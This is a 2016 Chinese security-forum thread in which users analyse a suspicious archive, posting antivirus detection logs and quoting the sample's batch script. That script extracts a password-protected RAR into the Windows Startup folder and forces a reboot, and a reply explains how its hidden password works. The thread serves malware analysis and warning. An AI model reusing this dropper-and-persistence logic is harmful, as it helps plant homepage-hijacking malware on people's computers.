可疑文件一枚

显示全部楼层 · 发表于 2016-5-27 22:18:38

本帖最后由尘梦幽然于 2016-5-27 23:06 编辑

解压mm.rar后：
安全威脅: TROJ_GEN.R03AC0VLI15
來源類型: 病毒
受影響的檔案: C:\Users\simplr\Desktop\…\LMIns.exe
處理行動: 已移除
偵測方式: 手動掃瞄

显示全部楼层 · 发表于 2016-5-27 22:23:20

本帖最后由 ymb668888 于 2016-5-27 22:24 编辑

显示全部楼层 · 发表于 2016-5-27 22:33:40

本帖最后由 XZ8SM7Sx0bVkoUV 于 2016-5-27 22:35 编辑

for /f "skip=1 tokens=2*" %%a in ('reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup') do set qd=%%b
set qd=%qd:~0,-1%
mm.exe x -y -p　 mm.rar ^"%qd%\^"
Shutdown.exe -r -f -t 0
包含脚本会解压压缩包exe 添加到启动目录并关机
压缩包内文件会锁首页此病毒关键程序被压缩包加密

显示全部楼层 · 发表于 2016-5-27 22:54:47

ymb668888 发表于 2016-5-27 22:23

压缩包的解压密码在mm.bat里，密码是：　
也就是一个类似空格的这样。
mm.exe是winrar的组件，用来通过bat来解压rar文件。
因此，这个样本的关键在于那个rar里面的那个LMIns.exe

由于这个LMIns.exe是已经被诺顿给检测了，因此，实际上这个样本除了添加一个2345.url到开机启动项中，以便每次开机时弹出2345推广主页之外，实际上对诺顿用户造不成其他的威胁。

显示全部楼层 · 发表于 2016-5-27 22:56:13

BAT/Agent.236 batch virus

Starting the file scan:

Begin scan in 'C:\Users\User\Downloads\Compressed\可疑\mm\解压密码.lnk'
C:\Users\User\Downloads\Compressed\可疑\mm\解压密码.lnk
  [DETECTION] Contains code of the LNK/Agent.asdg virus
  [NOTE]    The file was moved to the quarantine directory under the name 'b54c2efc.qua'!
Begin scan in 'C:\Users\User\Downloads\Compressed\可疑\mm\说明.lnk'
C:\Users\User\Downloads\Compressed\可疑\mm\说明.lnk
  [DETECTION] Contains code of the LNK/Agent.asdg virus
  [NOTE]    The file was moved to the quarantine directory under the name '49a374de.qua'!
Begin scan in 'C:\Users\User\Downloads\Compressed\可疑\你要的东西.exe'
C:\Users\User\Downloads\Compressed\可疑\你要的东西.exe
  [DETECTION] Is the TR/Agent.94208 Trojan
  [NOTE]    The file was moved to the quarantine directory under the name '81460db5.qua'!

显示全部楼层 · 发表于 2016-5-27 23:04:49

显示全部楼层 · 发表于 2016-5-28 00:54:23

尘梦幽然发表于 2016-5-27 22:54
压缩包的解压密码在mm.bat里，密码是：　
也就是一个类似空格的这样。
mm.exe是winrar的组件，用来通过 ...

嗦嘎

显示全部楼层 · 发表于 2016-5-28 06:03:16

LMIns.exe

Artemis!E4EC639C04CB

显示全部楼层 · 发表于 2016-5-28 09:53:36

尘梦幽然发表于 2016-5-27 22:54
压缩包的解压密码在mm.bat里，密码是：　
也就是一个类似空格的这样。
mm.exe是winrar的组件，用来通过 ...

上传下好吗？我解压不出来

[可疑文件] 可疑文件一枚

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

浏览过的版块